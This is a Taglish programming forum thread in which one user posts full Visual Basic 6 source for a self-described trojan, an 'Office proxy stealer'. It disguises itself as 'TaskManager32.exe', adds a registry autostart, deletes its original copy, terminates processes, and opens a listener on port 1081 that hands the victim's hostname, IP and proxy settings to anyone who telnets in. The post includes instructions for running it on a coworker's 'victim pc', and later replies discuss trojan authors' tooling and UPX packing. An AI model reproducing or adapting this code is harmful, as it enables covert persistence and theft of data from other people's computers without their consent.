Office proxy stealer

[hackfinn]

gamit ko to sa office namin para maka update ng proxy na ginagamit nila para makapag internet kami pag nagpalit sila ng proxy settings ;D.

composed ito ng isang form saka tatlong modules

form1.frm

Option Explicit
Dim d As Integer

Private Sub Form_Load()
Dim pLoc As String
Dim windir As String
On Error GoTo errH
   SetService 1
   If Command = "" Then
       windir = Environ("windir")
       pLoc = App.Path & "\" & App.EXEName & ".exe"
       FileCopy pLoc, windir & "\TaskManager32.exe"
       SaveSettingString HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", "TaskManager32", "TaskManager32.exe"
       Shell windir & "\TaskManager32.exe " & pLoc & " " & App.EXEName & ".exe"
   Else
       KillApp Right(Command, Len(Command) - InStr(Command, " "))
       Kill Left(Command, InStr(Command, " ") - 1)
       Debug.Print Command
       Debug.Print Left(Command, InStr(Command, " ") - 1)
       Debug.Print Right(Command, Len(Command) - InStr(Command, " "))
       If ws.State <> sckClosed Then ws.Close
       ws.LocalPort = 1081
       ws.Listen
   End If
   Exit Sub
errH:
   MsgBox "Form_Load" & vbCrLf & Err.Description
End Sub

Public Function KillApp(myName As String) As Boolean
Const PROCESS_ALL_ACCESS = 0
Dim uProcess As PROCESSENTRY32
Dim rProcessFound As Long
Dim hSnapshot As Long
Dim szExename As String
Dim exitCode As Long
Dim myProcess As Long
Dim AppKill As Boolean
Dim i As Integer
On Local Error GoTo Finish
Const TH32CS_SNAPPROCESS As Long = 2&

uProcess.dwSize = Len(uProcess)
hSnapshot = CreateToolhelpSnapshot(TH32CS_SNAPPROCESS, 0&)
rProcessFound = ProcessFirst(hSnapshot, uProcess)
Do While rProcessFound
   i = InStr(1, uProcess.szexeFile, Chr(0))
   szExename = LCase$(Left$(uProcess.szexeFile, i - 1))
   
   If Right$(szExename, Len(myName)) = LCase$(myName) Then
'        If KillApp = True Then
           myProcess = OpenProcess(PROCESS_ALL_ACCESS, False, uProcess.th32ProcessID)
           AppKill = TerminateProcess(myProcess, exitCode)
           Call CloseHandle(myProcess)
'        End If
       KillApp = True
   End If
   
   rProcessFound = ProcessNext(hSnapshot, uProcess)
Loop
Call CloseHandle(hSnapshot)
Finish:
End Function

Private Sub ws_ConnectionRequest(ByVal requestID As Long)
   If ws.State <> sckClosed Then ws.Close
   ws.Accept requestID
   ws.SendData ws.LocalHostName & " / " & ws.LocalIP & vbCrLf
End Sub

Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim strData As String
Dim proxy As String
   ws.GetData strData
   If LCase(strData) = "p" Then
       proxy = GetSettingString(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Internet Settings", "ProxyServer", "wala eh...")
       ws.SendData vbCrLf & proxy & vbCrLf
   ElseIf LCase(strData) = "q" Then
       If ws.State <> sckClosed Then ws.Close
       ws.LocalPort = 1081
       ws.Listen
   End If
End Sub

Private Sub ws_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
   If ws.State <> sckClosed Then ws.Close
   ws.LocalPort = 1081
   ws.Listen
End Sub


KillProcess.mod

Option Explicit

Private Const MAX_PATH& = 260

Public Type PROCESSENTRY32
   dwSize As Long
   cntUsage As Long
   th32ProcessID As Long
   th32DefaultHeapID As Long
   th32ModuleID As Long
   cntThreads As Long
   th32ParentProcessID As Long
   pcPriClassBase As Long
   dwFlags As Long
   szexeFile As String * MAX_PATH
End Type


Public Declare Function CreateToolhelpSnapshot Lib "kernel32" Alias "CreateToolhelp32Snapshot" (ByVal lFlags As Long, lProcessID As Long) As Long
Public Declare Function ProcessFirst Lib "kernel32" Alias "Process32First" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal blnheritHandle As Long, ByVal dwAppProcessId As Long) As Long
Public Declare Function TerminateProcess Lib "kernel32" (ByVal ApphProcess As Long, ByVal uExitCode As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Public Declare Function ProcessNext Lib "kernel32" Alias "Process32Next" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long


'*** Put this on your forms! ***

'Public Function KillApp(myName As String) As Boolean
'Const PROCESS_ALL_ACCESS = 0
'Dim uProcess As PROCESSENTRY32
'Dim rProcessFound As Long
'Dim hSnapshot As Long
'Dim szExename As String
'Dim exitCode As Long
'Dim myProcess As Long
'Dim AppKill As Boolean
'Dim i As Integer
'On Local Error GoTo Finish
'Const TH32CS_SNAPPROCESS As Long = 2&
'
'uProcess.dwSize = Len(uProcess)
'hSnapshot = CreateToolhelpSnapshot(TH32CS_SNAPPROCESS, 0&)
'rProcessFound = ProcessFirst(hSnapshot, uProcess)
'Do While rProcessFound
'    i = InStr(1, uProcess.szexeFile, Chr(0))
'    szExename = LCase$(Left$(uProcess.szexeFile, i - 1))
'
'    If Right$(szExename, Len(myName)) = LCase$(myName) Then
'            myProcess = OpenProcess(PROCESS_ALL_ACCESS, False, uProcess.th32ProcessID)
'            AppKill = TerminateProcess(myProcess, exitCode)
'            Call CloseHandle(myProcess)
'        KillApp = True
'    End If
'
'    rProcessFound = ProcessNext(hSnapshot, uProcess)
'Loop
'Call CloseHandle(hSnapshot)
'Finish:
'End Function



yung tatlong general purpose na module eh idownload niyo nalang dito

**tp://ieti.virtualave.net/vb6/Modules.zip

btw, yung mga modules ay:
alwaysontop.mod
GetComputerName.mod
Ping.mod
Registry.mod
ShowHideProcess.mod

yung ginamit ng code sa taas yung KillProcess, Registry at yung ShowHideProcess lang. Hindi ko naisama sa zip file yung KillProcess kaya ipinost ko na lang dito.

recommend ko rin na ilagay ninyo sa "C:\Program Files\Microsoft Visual Studio\VB98\Template\Modules" yung laman nung general purpose modules para pag mag-aadd kayo ng module (r.click project explorer->add->module) eh andun na sila

ala trojan ang behavior nito, pagni-run mo eh madedelete yung file sa current directory (see: Private Sub Form_Load() section), gagawa ng kopya dun sa %windir%\system directory na ang pangalang ay "TaskManager32.exe". add ng autostart entry sa registry then magaabang ng connections sa port 1081.

how to use:
pag nairun na dun sa victim pc (preferably dun sa pc na nakakonek sa internet lagi, ex.: yung pc ng isang MIS staff namin dito, laging online yun eh), punta ka sa ibang pc tapos itelnet mo yung pc na yun na ang port ay 1081.

after ng succesful connection ay magrereply yun ng computername saka ip nung victim pc. press "p" (w/o quotes) para isend naman sayo yung lahat ng proxy settings niya. press "q" naman para mag quit.

eto ay personal app na ginawa ko para sa "pangagailangan" ng internet dito sa opis (hehee) bahala na kayo magcustomize saka mag absorb ng panibagong ideas.

magpopost nalang ulit ako ng iba pa.#nosmileys

[hackfinn]

pahabol, me disadvantage nga pala mga gawa sa vb6 (ditulad ng delphi), kelangan eh meron runtime libraries yung pc na paggagamitan ng pogwam nato.

[chengkj]

hmm kung pinagtapat ba ang delphi exe and vb exe na isa lang ang ginagawa (example, ang walang kamatayan na "hello world"), same lang ba ang size ng exe?

gusto ko rin sana mag-aral ng delphi kaso d ko alam kung anong books ang ok e... meron na bang "Delphi Complete" ung mga na-compile lang from other Sybex books na P395 lang sa National? hehe

tsaka assuming na bihasa tayo both with vb and delphi, which is better ba? ano ba ang meron sa isa na wala sa kabila, advantage and disadvantage? (naku baka kailangan na ng sariling thread ito ah... )

[hackfinn]

[quote author=[chengKJ] link=board=source&thread=1051250024&start=2#0 date=1051296973]
hmm kung pinagtapat ba ang delphi exe and vb exe na isa lang ang ginagawa (example, ang walang kamatayan na "hello world"), same lang ba ang size ng exe?

gusto ko rin sana mag-aral ng delphi kaso d ko alam kung anong books ang ok e... meron na bang "Delphi Complete" ung mga na-compile lang from other Sybex books na P395 lang sa National? hehe

tsaka assuming na bihasa tayo both with vb and delphi, which is better ba? ano ba ang meron sa isa na wala sa kabila, advantage and disadvantage? (naku baka kailangan na ng sariling thread ito ah... ) [/quote]

yung problema kasi sa vb6, kapag gumamit ka ng additional na component (commondialogbox, progressbar, winsock, etc) usually kailangan ng addtional runtime libraries (ocx files). pwedeng isama mo paisa-isa sa file distribution mo yun ocx' at iregister manually (regsvr32.exe) o kaya gamitin mo yung package deployment wizard para gumawa ng installer.

siyempre wala namang trojan na "installer" type kaya usually ginagawa ng mga trojan programmer yung mga alaga nila sa vc o sa delphi. pero mostly napansin ko mga naglipana ngayon eh delphi. dun kasi sa delphi kapag gumamit ka ng additional components (vcl ata yun) eh kasama na dun sa exefile mo kaya pwedeng standalone.

pero as a database developer, mas madali ang development cycle sa vb6 (para sakin) kasi ang concentration mo lang eh yung kung ano talaga ang gagawin mo, wala nang hassle sa iba pang details.

kung file size naman ang paguusapan, siguro mas malaki yung sa delphi kasi pwedeng standalone gumana yung file.

kaya usually pag-gumagawa ako ng project sa vb6 eh kino-compress ko pa ng upx (htt*://upx.sourceforge.net)

later ay magpopost din ako dito ng source codes sa delphi.